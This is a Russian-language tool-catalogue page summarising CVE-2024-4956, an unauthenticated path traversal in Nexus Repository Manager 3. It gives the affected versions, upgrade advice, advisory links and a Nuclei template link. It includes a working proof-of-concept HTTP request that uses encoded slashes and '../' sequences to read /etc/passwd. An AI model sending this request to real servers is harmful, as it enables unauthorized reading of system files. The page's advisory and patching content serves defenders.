Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-4956 — Неаутентифицированный обход пути в Nexus Repository 3 | Kitploit
Инструменты/GitHubGitHub/gmh5225/cve-2024-4956
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubgmh5225/cve-2024-4956

CVE-2024-4956

Неаутентифицированный обход пути в Nexus Repository 3

Репозиторий
22 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-4956 - Неаутентифицированный обход пути в Nexus Repository Manager 3

Nexus Repository Manager — это менеджер репозиториев, который организует, хранит и распространяет артефакты, необходимые для разработки.

Уязвимость обхода пути была обнаружена в Nexus Repository 3, в версиях до 3.68.1. Эта уязвимость позволяет злоумышленнику создать URL для загрузки системных файлов за пределами области действия приложения Nexus Repository, без какой-либо аутентификации. Это представляет значительный риск, так как может привести к раскрытию чувствительных системных файлов и потенциально скомпрометировать безопасность среды, где установлен Nexus Repository.

Рекомендуется как можно скорее обновить Nexus Repository до версии 3.68.1 или новее, чтобы устранить эту уязвимость.

Для получения дополнительной информации и технических деталей об уязвимости, пожалуйста, обратитесь по следующей ссылке:

Ссылки:

  • https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16

Уязвимые версии

Уязвимость затрагивает версии с 3.0 по 3.68.0 Sonatype Nexus Repository Manager.

Меры по смягчению:

Обновление Nexus Repository является рекомендуемым способом устранения этой уязвимости. Однако для развертываний, которые не могут быть немедленно обновлены, доступны варианты оперативного смягчения:

Ссылки:

  • https://support.sonatype.com/hc/en-us/articles/29412417068819

PoC

root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

С помощью приведенного выше PoC можно увидеть доступ к файлу /etc/passwd:

Шаблон Nuclei

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml

Скачать инструмент